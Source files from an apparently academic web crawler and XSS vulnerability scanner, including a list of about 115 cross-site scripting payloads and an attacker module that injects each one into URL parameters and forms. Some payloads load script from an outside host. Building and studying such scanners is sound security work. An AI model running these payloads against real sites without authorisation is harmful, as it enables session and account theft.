119 |         if not self._analyzing_finished:
120 |             self.content_type[reply.url().toString()] = reply.header(QNetworkRequest.ContentTypeHeader)
121 |             if reply.attribute(QNetworkRequest.HttpStatusCodeAttribute) is None:
122 |                 logging.error("Response Code is None: Maybe, you dumb idiot, has set a proxy but not one running!!!")
123 |                 return
124 |             else:
125 |                 #logging.debug("Response Code for {} is {}".format(reply.url().toString(), reply.attribute(QNetworkRequest.HttpStatusCodeAttribute)))
126 |                 self.response_code[reply.url().toString()] = reply.attribute(QNetworkRequest.HttpStatusCodeAttribute)
127 | 
128 |     def jsWinObjClearedHandler(self):  # Adding here the js-scripts I need
129 |         if not self._analyzing_finished:
130 |             self.mainFrame().addToJavaScriptWindowObject("jsb", self._js_bridge)
131 | 
132 |     def xss_callback(self, msg):
133 |         logging.debug("XSS callback occurs with message: {}".format(msg))
134 |         if self._random_value in msg:
135 |             self._attack_successfull = True
136 | 
137 | 
138 | 
139 | 
140 | 
141 | class AttackResult(Enum):
142 |     AttackSuccessfull = 0
143 |     AttackFailed = 1
144 |     ErrorTimeout = 2
145 |     NotFound = 3 #The random value is not inside the html...
146 |     JSON = 4


--------------------------------------------------------------------------------
/crawler/attack/xssvectors.txt:
--------------------------------------------------------------------------------
  1 | ﻿<SCRIPT>jsb.attack(XSS)</SCRIPT>
  2 | "/><script>jsb.attack(XSS);</script>
  3 | %3Cimg%20onerror%3Djsb.attack(XSS)%3B%20src%3Dx%3Es
  4 | '"--></style></scRipt><scRipt>jsb.attack(XSS)</scRipt>
  5 | <IMG """><SCRIPT>jsb.attack(XSS)</SCRIPT>">
  6 | '"--></style></scRipt><scRipt>jsb.attack(XSS)</scRipt>
  7 | '" onmouseover= jsb.attack(XSS)
  8 | /"onmouseover="jsb.attack(XSS)
  9 | ";><BODY ONLOAD=jsb.attack(XSS)>
 10 | ";><script>jsb.attack(XSS)</script>
 11 | <BASE HREF="javascript:jsb.attack(XSS);//">
 12 | <BGSOUND SRC="javascript:jsb.attack(XSS);">
 13 | <BODY BACKGROUND="javascript:jsb.attack(XSS);">
 14 | <BODY ONLOAD=jsb.attack(XSS)>
 15 | <DIV STYLE="background-image:url(javascript:jsb.attack(XSS))">
 16 | <DIV STYLE="background-image: url(javascript:jsb.attack(XSS))">
 17 | <DIV STYLE="width: expression(jsb.attack(XSS));">
 18 | <INPUT TYPE="IMAGE" SRC="javascript:jsb.attack(XSS);">
 19 | <IMG SRC="javascript:jsb.attack(XSS);">
 20 | <IMG SRC=javascript:jsb.attack(XSS)>
 21 | <IMG DYNSRC="javascript:jsb.attack(XSS);">
 22 | <BGSOUND SRC=\"javascript:jsb.attack(XSS);\">.txt
 23 | <BODY BACKGROUND=\"javascript:jsb.attack(XSS)\">.txt
 24 | <BODY ONLOAD=jsb.attack(XSS)>.txt"
 25 | <BR SIZE=\"&{jsb.attack(XSS)}\">.txt"
 26 | <DIV STYLE=\"background-image: url(javascript:jsb.attack(XSS))\">.txt
 27 | <DIV STYLE=\"background-image: url(javascript:jsb.attack(XSS))\">.txt
 28 | <DIV STYLE=\"width: expression(jsb.attack(XSS));\">.txt
 29 | <IMG DYNSRC=\"javascript:jsb.attack(XSS)\">.txt
 30 | <IMG LOWSRC=\"javascript:jsb.attack(XSS)\">.txt
 31 | IMG SRC=\" &#14;  javascript:jsb.attack(XSS);\">.txt
 32 | <IMG SRC=`javascript:jsb.attack(\"RSnake says, XSS\")`>.txt
 33 | <IMG SRC=javascript:jsb.attack(String.fromCharCode(XSS))>.txt
 34 | <IMG SRC=\"javascript:jsb.attack(XSS);\">.txt
 35 | <IMG SRC=\"javascript:jsb.attack(XSS)\".txt
 36 | <IMG SRC=javascript:jsb.attack(XSS)>.txt
 37 | <IMG SRC=javascript:jsb.attack(\"XSS\")>.txt
 38 | <IMG SRC=JaVaScRiPt:jsb.attack(XSS)>.txt
 39 | <IMG SRC=\"javtascript:jsb.attack(XSS);\">.txt
 40 | <IMG SRC=\"jav&#x09;ascript:jsb.attack(XSS);\">.txt
 41 | <IMG SRC=\"jav&#x0A;ascript:jsb.attack(XSS);\">.txt
 42 | <IMG SRC=\"jav&#x0D;ascript:jsb.attack(XSS);\">.txt
 43 | <IMG SRC=\"livescript:[code]\">.txt
 44 | <IMG SRC='vbscript:msgbox(\"XSS\")'>.txt
 45 | <INPUT TYPE=\"IMAGE\" SRC=\"javascript:jsb.attack(XSS);\">.txt
 46 | <LINK REL=\"stylesheet\" HREF=\"javascript:jsb.attack(XSS);\">.txt
 47 | <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:jsb.attack(XSS);\">.txt
 48 | perl -e 'print \"<IMG SRC=java\\0script:jsb.attack(\\\"XSS\\\")>\";' > out.txt
 49 | <TABLE BACKGROUND=\"javascript:jsb.attack(XSS)\">.txt
 50 | <TABLE><TD BACKGROUND=\"javascript:jsb.attack(XSS)\">.txt
 51 | <XSS STYLE=\"behavior: url(xss.htc);\">.txt
 52 | <XSS STYLE=\"xss:expression(jsb.attack(XSS))\">.txt
 53 | <IMG SRC=\"javascript:jsb.attack(XSS);\">
 54 | <IMG SRC=javascript:jsb.attack(XSS)>
 55 | <IMG SRC=JaVaScRiPt:jsb.attack(XSS)>
 56 | <IMG SRC=javascript:jsb.attack(\"XSS\")>
 57 | <IMG SRC=`javascript:jsb.attack(\"RSnake says, XSS\")`>
 58 | <IMG \"\"\"><SCRIPT>jsb.attack(\"XSS\")</SCRIPT>\">
 59 | <IMG SRC=\"jav\tascript:jsb.attack(XSS);\">
 60 | <IMG SRC=\"jav&#x09;ascript:jsb.attack(XSS);\">
 61 | <IMG SRC=\"jav&#x0A;ascript:jsb.attack(XSS);\">
 62 | <IMG SRC=\"jav&#x0D;ascript:jsb.attack(XSS);\">
 63 | perl -e 'print \"<IMG SRC=java\\0script:jsb.attack(\\\"XSS\\\")>\";' >
 64 | <IMG SRC=\" &#14;  javascript:jsb.attack(XSS);\">
 65 | <SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
 66 | <BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=jsb.attack(\"XSS\")>
 67 | <SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
 68 | <<SCRIPT>jsb.attack(\"XSS\");//<</SCRIPT>
 69 | <IMG SRC=\"javascript:jsb.attack(XSS)\"
 70 | \\\";jsb.attack(XSS);//
 71 | </TITLE><SCRIPT>jsb.attack(\"XSS\");</SCRIPT>
 72 | <INPUT TYPE=\"IMAGE\" SRC=\"javascript:jsb.attack(XSS);\">
 73 | <BODY BACKGROUND=\"javascript:jsb.attack(XSS)\">
 74 | <IMG DYNSRC=\"javascript:jsb.attack(XSS)\">
 75 | <IMG LOWSRC=\"javascript:jsb.attack(XSS)\">
 76 | <STYLE>li {list-style-image: url(\"javascript:jsb.attack(XSS)\");}</STYLE><UL><LI>XSS</br>
 77 | <IMG SRC='vbscript:msgbox(\"XSS\")'>
 78 | <IMG SRC=\"livescript:[code]\">
 79 | <BODY ONLOAD=jsb.attack(XSS)>
 80 | <BGSOUND SRC=\"javascript:jsb.attack(XSS);\">
 81 | <BR SIZE=\"&{jsb.attack(XSS)}\">
 82 | <LINK REL=\"stylesheet\" HREF=\"javascript:jsb.attack(XSS);\">
 83 | <STYLE>@im\\port'\\ja\\vasc\\ript:jsb.attack(\"XSS\")';</STYLE>
 84 | <IMG STYLE=\"xss:expr/*XSS*/ession(jsb.attack(XSS))\">
 85 | exp/*<A STYLE='no\\xss:noxss(\"*//*\");\nxss:ex/*XSS*//*/*/pression(jsb.attack(\"XSS\"))'>
 86 | <STYLE TYPE=\"text/javascript\">jsb.attack(XSS);</STYLE>
 87 | <STYLE>.XSS{background-image:url(\"javascript:jsb.attack(XSS)\");}</STYLE><A CLASS=XSS></A>
 88 | <STYLE type=\"text/css\">BODY{background:url(\"javascript:jsb.attack(XSS)\")}</STYLE>
 89 | <XSS STYLE=\"xss:expression(jsb.attack(XSS))\">
 90 | ¼script¾jsb.attack(¢XSS¢)¼/script¾"
 91 | <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:jsb.attack(XSS);\">
 92 | <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:jsb.attack(XSS);\">
 93 | <IFRAME SRC=\"javascript:jsb.attack(XSS);\"></IFRAME>
 94 | <FRAMESET><FRAME SRC=\"javascript:jsb.attack(XSS);\"></FRAMESET>
 95 | <TABLE BACKGROUND=\"javascript:jsb.attack(XSS)\">
 96 | <TABLE><TD BACKGROUND=\"javascript:jsb.attack(XSS)\">
 97 | <DIV STYLE=\"background-image: url(javascript:jsb.attack(XSS))\">
 98 | <DIV STYLE=\"background-image: url(javascript:jsb.attack(XSS))\">
 99 | <DIV STYLE=\"width: expression(jsb.attack(XSS));\">
100 | <!--[if gte IE 4]>\n <SCRIPT>jsb.attack(XSS);</SCRIPT>\n <![endif]-->
101 | <BASE HREF=\"javascript:jsb.attack(XSS);//\">
102 | a=\"get\";\nb=\"URL(\\\"\";\nc=\"javascript:\";\nd=\"jsb.attack(XSS);\\\")\";\neval(a+b+c+d);
103 | <XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:jsb.attack(XSS)\"></B></I></XML>\n<SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>
104 | <XML SRC=\"xsstest.xml\" ID=I></XML>\n<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
105 | <HTML><BODY>\n<?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\">\n<?import namespace=\"t\" implementation=\"#default#time2\">\n<t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>jsb.attack(\"XSS\")</SCRIPT>\">\n</BODY></HTML>
106 | <SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>
107 | <!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"-->
108 | <? echo('<SCR)';\necho('IPT>jsb.attack(\"XSS\")</SCRIPT>'); ?>
109 | <META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>jsb.attack(XSS)</SCRIPT>\">
110 | <HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-jsb.attack(XSS);+ADw-/SCRIPT+AD4-
111 | ;!--\'<XSS>=&{()}\\xss<script>jsb.attack(XSS)</script>
112 | <IMG """><SCRIPT>jsb.attack("XSS")</SCRIPT>">
113 | <<SCRIPT>jsb.attack("XSS");//<</SCRIPT>
114 | ""<SCRIPT>a=/TSS/jsb.attack(XSS)</SCRIPT>""
115 | \\";jsb.attack(\'XSS\');//
116 | 


--------------------------------------------------------------------------------
/crawler/attack/xxxattacks.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 | 
18 | import logging
19 | import os
20 | import random
21 | import string
22 | 
23 | 
24 | __author__ = 'constantin'
25 | 
26 | 
27 | FILENAME = "/xssvectors.txt"
28 | class XSSVectors():
29 | 
30 |     def __init__(self):
31 |         self.attack_vectors = []
32 |         for line in open(os.path.dirname(os.path.realpath(__file__)) + FILENAME, "r"):
33 |             self.attack_vectors.append(line[:-1])
34 | 
35 |     def random_string_generator(self, size=6, chars=string.ascii_uppercase + string.digits+string.ascii_lowercase):
36 |         result = ""
37 |         for i in range(size):
38 |             result += random.choice(chars)
39 |         return result
40 | 
41 |     def random_number_generator(self, size=6):
42 |         i = 1
43 |         max_num = ""
44 |         min_num = "1"
45 |         for i in range(size + 1):
46 |             max_num += "9"
47 |             min_num += "0"
48 |         min_num = min_num[:-1]
49 |         max_num = int(max_num)
50 |         min_num = int(min_num)
51 |         return str(random.randint(min_num, max_num))
52 | 


--------------------------------------------------------------------------------
/crawler/attacker.py:
--------------------------------------------------------------------------------
  1 | '''
  2 | Copyright (C) 2015 Constantin Tschuertz
  3 | 
  4 | This program is free software: you can redistribute it and/or modify
  5 | it under the terms of the GNU General Public License as published by
  6 | the Free Software Foundation, either version 3 of the License, or
  7 | any later version.
  8 | 
  9 | This program is distributed in the hope that it will be useful,
 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 12 | GNU General Public License for more details.
 13 | 
 14 | You should have received a copy of the GNU General Public License
 15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
 16 | '''
 17 | 
 18 | from asyncio.tasks import sleep
 19 | import logging
 20 | import sys
 21 | from urllib.parse import urlparse
 22 | 
 23 | 
 24 | from attack.xss import XSSAttacker, AttackResult
 25 | from attack.xxxattacks import XSSVectors
 26 | from core.jaekcore import JaekCore
 27 | from models.url import Url
 28 | from models.utils import CrawlSpeed
 29 | from utils.domainhandler import DomainHandler
 30 | from utils.execptions import LoginFailed
 31 | 
 32 | 
 33 | 
 34 | __author__ = 'constantin'
 35 | 
 36 | EMPTY_LIMIT = 5
 37 | class Attacker(JaekCore):
 38 |     def __init__(self, config, proxy="", port=0, database_manager=None):
 39 |         super(Attacker, self).__init__(config, proxy="", port=0, database_manager=database_manager)
 40 | 
 41 |         self._xss = XSSAttacker(self, proxy, port, crawl_speed=CrawlSpeed.Medium,
 42 |                                              network_access_manager=self._network_access_manager)
 43 | 
 44 |         self._xss_vector = XSSVectors()
 45 | 
 46 |     def attack(self, user):
 47 |         self.domain_handler = DomainHandler(self.config.start_page_url, self.database_manager, cluster_manager=None)
 48 |         self.user = user
 49 |         if user.login_data is not None:
 50 |             self.process_with_login = True
 51 |             go_on = self._initial_login()
 52 |             if not go_on:
 53 |                 raise LoginFailed("Initial login failed...")
 54 |         self.attack_all_urls_with_replacing()
 55 |         self.attack_all_urls_with_additions()
 56 |         self.attack_all_get_forms()
 57 |         #url = "http://localhost:8080/index.php/apps/files/ajax/download.php?files=moep&dir=tut"
 58 |         #url = "http://localhost:8080/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=t47sx79npgz01tywyeo3wwuuxz03u7vh"
 59 |         #url = "http://localhost:8080/admin.php?page=plugin-AdminTool%3Cimg%20onerror%3Dalert(123)%3B%20src%3Dx%3Es"
 60 |         #url = "http://localhost:8080/report.php?type=post&pid=1"
 61 |         #self.attack_single_url(url, replacement= True)
 62 | 
 63 | 
 64 |     def attack_single_url(self, url, replacement=False):
 65 |         if not replacement:
 66 |             attack_url = url
 67 |             result, response_code = self._xss.attack(attack_url, "123")
 68 |             logging.debug("Result: {}".format(result))
 69 |             return
 70 |         url = Url(url)
 71 |         for parameter_to_attack in url.parameters:
 72 |             for vector in self._xss_vector.attack_vectors:
 73 |                 attack_url = url.scheme + "://" + url.domain + url.path + "?"
 74 |                 random_val = self._xss_vector.random_number_generator(12)
 75 |                 ramdom_val = "123"
 76 |                 for other_parameters in url.parameters:
 77 |                     if parameter_to_attack == other_parameters:
 78 |                         attack_url += other_parameters + "=" + vector.replace("XSS", random_val) + "&"
 79 |                     else:
 80 |                         attack_url += other_parameters + "=" + url.parameters[other_parameters][0] + "&"
 81 |                 attack_url = attack_url[:-1] # Removing the last "&
 82 |                 logging.debug("Attack with: {}".format(attack_url))
 83 |                 result, response_code = self._xss.attack(attack_url, random_val)
 84 |                 logging.debug("Result: {}".format(result))
 85 | 
 86 | 
 87 |     def attack_all_urls_with_additions(self):
 88 |         domain = urlparse(self.config.start_page_url)
 89 |         domain = domain.netloc
 90 |         all_urls = self.database_manager.get_all_urls_to_domain(domain)
 91 |         for url in all_urls:
 92 |             if len(url.parameters) > 0:
 93 |                 logging.debug("Now testing with url: {}".format(url.toString()))
 94 |                 if self.process_with_login:
 95 |                     self._handle_possible_logout()
 96 |                 for parameter_to_attack in url.parameters:
 97 |                     empty_counter = 0
 98 |                     for vector in self._xss_vector.attack_vectors:
 99 |                         attack_url = url.scheme + "://" + url.domain + url.path + "?"
100 |                         random_val = self._xss_vector.random_number_generator(12)
101 |                         for other_parameters in url.parameters:
102 |                             if parameter_to_attack == other_parameters:
103 |                                 attack_url += other_parameters + "=" + str(url.parameters[other_parameters][0]) if url.parameters[other_parameters][0] is not None else ""
104 |                                 attack_url += vector.replace("XSS", str(random_val)) + "&"
105 |                             else:
106 |                                 attack_url += other_parameters + "="
107 |                                 attack_url += url.parameters[other_parameters][0] if url.parameters[other_parameters][0] is not None else ""
108 |                                 attack_url += "&"
109 |                         attack_url = attack_url[:-1] # Removing the last "&
110 |                         logging.debug("Attack with: {}".format(attack_url))
111 |                         result, response_code = self._xss.attack(attack_url, random_val)
112 |                         if not self._check_login_status_with_cookies():
113 |                             sleep(2000)
114 |                             self._initial_login()
115 |                             result, response_code = self._xss.attack(attack_url, random_val)
116 |                         if response_code is None:
117 |                             continue
118 |                         if response_code >= 400 or result == AttackResult.JSON:
119 |                             empty_counter = 42
120 |                         logging.debug("Result: {} - Response Code: {}" .format(result, response_code))
121 |                         if result in (AttackResult.AttackSuccessfull, AttackResult.AttackFailed):
122 |                             self.database_manager.insert_attack_result(result, attack_url)
123 |                             empty_counter = 0
124 |                         else:
125 |                             empty_counter += 1
126 |                         if empty_counter > EMPTY_LIMIT:
127 |                             break
128 | 
129 | 
130 | 
131 |     def attack_all_urls_with_replacing(self):
132 |         all_urls = self.database_manager.get_one_visited_url_per_structure()
133 |         for url in all_urls:
134 |             if len(url.parameters) > 0:
135 |                 logging.debug("Now testing with url: {}".format(url.toString()))
136 |                 if self.process_with_login:
137 |                     self._handle_possible_logout()
138 |                 for parameter_to_attack in url.parameters:
139 |                     empty_counter = 0
140 |                     for vector in self._xss_vector.attack_vectors:
141 |                         attack_url = url.scheme + "://" + url.domain + url.path + "?"
142 |                         random_val = self._xss_vector.random_number_generator(12)
143 |                         for other_parameters in url.parameters:
144 |                             if parameter_to_attack == other_parameters:
145 |                                 attack_url += other_parameters + "=" + vector.replace("XSS", random_val) + "&"
146 |                             else:
147 |                                 attack_url += other_parameters + "="
148 |                                 attack_url += url.parameters[other_parameters][0] if url.parameters[other_parameters][0] is not None else ""
149 |                                 attack_url += "&"
150 |                         attack_url = attack_url[:-1] # Removing the last "&
151 |                         logging.debug("Attack with: {}".format(attack_url))
152 |                         result, response_code = self._xss.attack(attack_url, random_val)
153 |                         if not self._check_login_status_with_cookies():
154 |                             sleep(2000)
155 |                             self._initial_login()
156 |                             result, response_code = self._xss.attack(attack_url, random_val)
157 |                         if response_code is None:
158 |                             continue
159 |                         if response_code >= 400 or result == AttackResult.JSON:
160 |                             empty_counter = 42
161 |                         logging.debug("Result: {} - Response Code: {}" .format(result, response_code))
162 |                         if result in (AttackResult.AttackSuccessfull, AttackResult.AttackFailed):
163 |                             self.database_manager.insert_attack_result(result, attack_url)
164 |                             empty_counter = 0
165 |                         else:
166 |                             empty_counter += 1
167 |                         if empty_counter > EMPTY_LIMIT:
168 |                             break
169 | 
170 |     def attack_all_get_forms(self):
171 |         if self.process_with_login:
172 |                 self._handle_possible_logout()
173 |         logging.debug("Attacking with get forms")
174 |         all_forms = self.database_manager.get_one_form_per_destination()
175 |         for form in all_forms:
176 |             logging.debug(form.toString())
177 |             if "javascript" in form.action.complete_url:
178 |                 continue
179 |             for param_to_attack in form.parameter:
180 |                 if param_to_attack.input_type == "submit" or param_to_attack.name is None:
181 |                     continue
182 |                 logging.debug("Now at paramerter {}".format(param_to_attack.toString()))
183 |                 empty_counter = 0
184 |                 for vector in self._xss_vector.attack_vectors:
185 |                     attack_url = form.action.complete_url + "?"
186 |                     random_val = self._xss_vector.random_number_generator(12)
187 |                     for other_parameter in form.parameter:
188 |                         if param_to_attack == other_parameter:
189 |                             if other_parameter is None or other_parameter.name is None:
190 |                                 continue
191 |                             attack_url += other_parameter.name + "=" + vector.replace("XSS", random_val) + "&"
192 |                         else:
193 |                             if other_parameter.input_type == "submit" or other_parameter.name is None:
194 |                                 continue
195 |                             elif other_parameter.values is None:
196 |                                 attack_url += other_parameter.name + "=&"
197 |                             elif other_parameter.values[0] is not None:
198 |                                 attack_url += other_parameter.name + "=" + other_parameter.values[0] + "&"
199 |                             else:
200 |                                 attack_url += other_parameter.name + "=" + self._xss_vector.random_string_generator(6) + "&"
201 |                     attack_url = attack_url[:-1]
202 |                     logging.debug("Attack with: {}".format(attack_url))
203 |                     result, response_code = self._xss.attack(attack_url, random_val)
204 |                     if not self._check_login_status_with_cookies():
205 |                         sleep(2000)
206 |                         self._initial_login()
207 |                         result, response_code = self._xss.attack(attack_url, random_val)
208 |                     if response_code is None:
209 |                         continue
210 |                     if response_code >= 400 or result == AttackResult.JSON:
211 |                         empty_counter = 42
212 |                     logging.debug("Result: {} - Response Code: {}" .format(result, response_code))
213 |                     if result in (AttackResult.AttackSuccessfull, AttackResult.AttackFailed):
214 |                         self.database_manager.insert_attack_result(result, attack_url)
215 |                         empty_counter = 0
216 |                     else:
217 |                         empty_counter += 1
218 |                     if empty_counter > EMPTY_LIMIT:
219 |                         break
220 | 
221 | 
222 | 
223 | 
224 | 
225 | 


--------------------------------------------------------------------------------
/crawler/core/__init__.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''


--------------------------------------------------------------------------------
/crawler/core/clustermanager.py:
--------------------------------------------------------------------------------
  1 | '''
  2 | Copyright (C) 2015 Constantin Tschuertz
  3 | 
  4 | This program is free software: you can redistribute it and/or modify
  5 | it under the terms of the GNU General Public License as published by
  6 | the Free Software Foundation, either version 3 of the License, or
  7 | any later version.
  8 | 
  9 | This program is distributed in the hope that it will be useful,
 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 12 | GNU General Public License for more details.
 13 | 
 14 | You should have received a copy of the GNU General Public License
 15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
 16 | '''
 17 | 
 18 | import itertools
 19 | import logging
 20 | from copy import deepcopy
 21 | from models.url import Url
 22 | from utils.utils import calculate_similarity_between_pages
 23 | 
 24 | 
 25 | __author__ = 'constantin'
 26 | 
 27 | CLUSTER_THRESHOLD = .2
 28 | 
 29 | class ClusterManager():
 30 |     """
 31 |     A cluster is a collection of similar pages, defined through a cluster function
 32 |     """
 33 | 
 34 |     def __init__(self, persistence_manager):
 35 |         self._persistence_manager = persistence_manager
 36 |         self._similarity_cache = {} #Stores in a tripple: List(ids), result
 37 | 
 38 |     @property
 39 |     def get_clusters(self):
 40 |         return self._clusters
 41 | 
 42 |     def get_cluster(self, url_description):
 43 |         try:
 44 |             return self._clusters[url_description].values()
 45 |         except:
 46 |             raise KeyError("No cluster with that id found")
 47 | 
 48 |     def add_webpage_to_cluster(self, webpage):
 49 |         url = Url(webpage.url)
 50 |         clusters = self._persistence_manager.get_clusters(url.url_hash)
 51 |         if clusters is None:
 52 |             #self._clusters[url.url_hash] = [webpage.id]
 53 |             self._persistence_manager.write_clusters(url.url_hash, [webpage.id])
 54 |         else:
 55 |             tmp = []
 56 |             for c in clusters:
 57 |                 if isinstance(c, list):
 58 |                     tmp.extend(c)
 59 |                 else:
 60 |                     tmp.append(c)
 61 |             tmp.append(webpage.id)
 62 |             new_clusters = self.hierarchical_clustering(tmp, CLUSTER_THRESHOLD)
 63 |             for c in new_clusters:
 64 |                 if isinstance(c, int): # Konvert integer to list, so mongo store all seperate single clusters in its own lists.
 65 |                     new_clusters.remove(c)
 66 |                     new_clusters.insert(0, [c])
 67 |             self._persistence_manager.write_clusters(url.url_hash, new_clusters)
 68 | 
 69 | 
 70 |     def hierarchical_clustering(self, clusters, threshold):
 71 |         result = []
 72 |         rest_clusters = clusters
 73 |         while len(rest_clusters) > 1:
 74 |             combinations_of_clusters = list(itertools.combinations(rest_clusters, 2))
 75 |             distances = []
 76 |             for combi in combinations_of_clusters:
 77 |                 distance = self.calculate_minimum_distance(combi[0], combi[1])
 78 |                 distances.append((distance, combi[0], combi[1]))
 79 |             #distances = sorted(distances, key=lambda x: x[0])
 80 |             min_distance = min(distances, key=lambda x: x[0])
 81 |             if min_distance[0] > threshold:
 82 |                 break
 83 |             else:
 84 |                 rest_clusters.remove(min_distance[1])
 85 |                 rest_clusters.remove(min_distance[2])
 86 |                 if isinstance(min_distance[1], int):
 87 |                     a = min_distance[1],
 88 |                 else:
 89 |                     a = min_distance[1]
 90 |                 if isinstance(min_distance[2], int):
 91 |                     b = min_distance[2],
 92 |                 else:
 93 |                     b = min_distance[2]
 94 |                 new_cluster = a + b
 95 |                 rest_clusters.append(new_cluster)
 96 |         return rest_clusters
 97 | 
 98 |     def calculate_minimum_distance(self, cluster1, cluster2):
 99 |         if isinstance(cluster1, int):
100 |             cluster1 = [cluster1]
101 |         else:
102 |             cluster1 = list(cluster1)
103 |         if isinstance(cluster2, int):
104 |             cluster2 = [cluster2]
105 |         else:
106 |             cluster2 = list(cluster2)
107 |         all_nodes =  cluster1 + cluster2
108 |         all_combinations = list(itertools.combinations(all_nodes, 2))
109 |         distances = []
110 |         for combi in all_combinations:
111 |             if combi[0] in cluster1 and combi[1] in cluster1 or combi[0] in cluster2 and combi[1] in cluster2:
112 |                 continue
113 |             distance = self.calculate_distance(combi[0], combi[1])
114 |             distances.append((combi[0], combi[1], distance))
115 |         min_distance = min(distances, key=lambda x: x[2])
116 |         return min_distance[2]
117 | 
118 |     def calculate_distance(self, x, y):
119 |         name = self.get_similarity_identifier(x, y)
120 |         if name in self._similarity_cache:
121 |             result = self._similarity_cache[name]
122 |         else:
123 |             page_x = self._persistence_manager.get_web_page_to_id(x)
124 |             page_y = self._persistence_manager.get_web_page_to_id(y)
125 |             result = calculate_similarity_between_pages(page_x, page_y, verbose=True)
126 |             self._similarity_cache[name] = result
127 |         return 1 - result
128 | 
129 |     def get_similarity_identifier(self, x, y):
130 |         name = (x, y)
131 |         name = sorted(name)
132 |         return str(name[0])+"$"+str(name[1])
133 | 
134 |     def calculate_cluster_per_visited_urls(self, url_hash):
135 |         try:
136 |             return self.num_of_clusters(url_hash) / self.num_of_visited_urls(url_hash)
137 |         except ZeroDivisionError:
138 |             return 1.0
139 | 
140 |     def num_of_clusters(self, url_hash):
141 |         clusters = self._persistence_manager.get_clusters(url_hash)
142 |         if clusters is not None:
143 |             return len(clusters)
144 |         return 1.0
145 | 
146 |     def num_of_visited_urls(self, url_hash):
147 |         return self._persistence_manager.count_visited_url_per_hash(url_hash)
148 | 
149 |     def need_more_urls_of_this_type(self, url_hash):
150 |         """
151 |         :param url_hash:
152 |         :return: if we have seen enough of an url or not
153 |         """
154 |         return self.calculate_cluster_per_visited_urls(url_hash) > CLUSTER_THRESHOLD
155 | 
156 | 
157 | 
158 | 
159 | 
160 | 
161 | 


--------------------------------------------------------------------------------
/crawler/core/eventexecutor.py:
--------------------------------------------------------------------------------
  1 | '''
  2 | Copyright (C) 2015 Constantin Tschuertz
  3 | 
  4 | This program is free software: you can redistribute it and/or modify
  5 | it under the terms of the GNU General Public License as published by
  6 | the Free Software Foundation, either version 3 of the License, or
  7 | any later version.
  8 | 
  9 | This program is distributed in the hope that it will be useful,
 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 12 | GNU General Public License for more details.
 13 | 
 14 | You should have received a copy of the GNU General Public License
 15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
 16 | '''
 17 | 
 18 | import logging
 19 | import random
 20 | import string
 21 | from enum import Enum
 22 | 
 23 | from PyQt5.Qt import QUrl
 24 | from PyQt5.QtWebKitWidgets import QWebPage
 25 | from analyzer.helper.formhelper import extract_forms
 26 | from analyzer.helper.linkhelper import extract_links
 27 | 
 28 | from analyzer.helper.propertyhelper import property_helper
 29 | from models.ajaxrequest import AjaxRequest
 30 | from models.deltapage import DeltaPage
 31 | from models.enumerations import XHRBehavior
 32 | from models.keyclickable import KeyClickable
 33 | from core.interactioncore import InteractionCore
 34 | from models.utils import CrawlSpeed, purge_dublicates
 35 | 
 36 | 
 37 | class EventExecutor(InteractionCore):
 38 | 
 39 |     def __init__(self, parent, proxy="", port=0, crawl_speed=CrawlSpeed.Medium, network_access_manager=None):
 40 |         super(EventExecutor, self).__init__(parent, proxy, port, crawl_speed, network_access_manager)
 41 |         self._url_changed = False  # Inidicates if a event changes a location => treat it as link!
 42 |         self._new_url = None
 43 |         self.timeming_events = None
 44 |         self.none_key_events = ['click', 'focus', 'blur', 'dblclick', 'input', 'change',
 45 |                                  'mousedown', 'mousemove', 'mouseout', 'mouseover', 'mouseup',
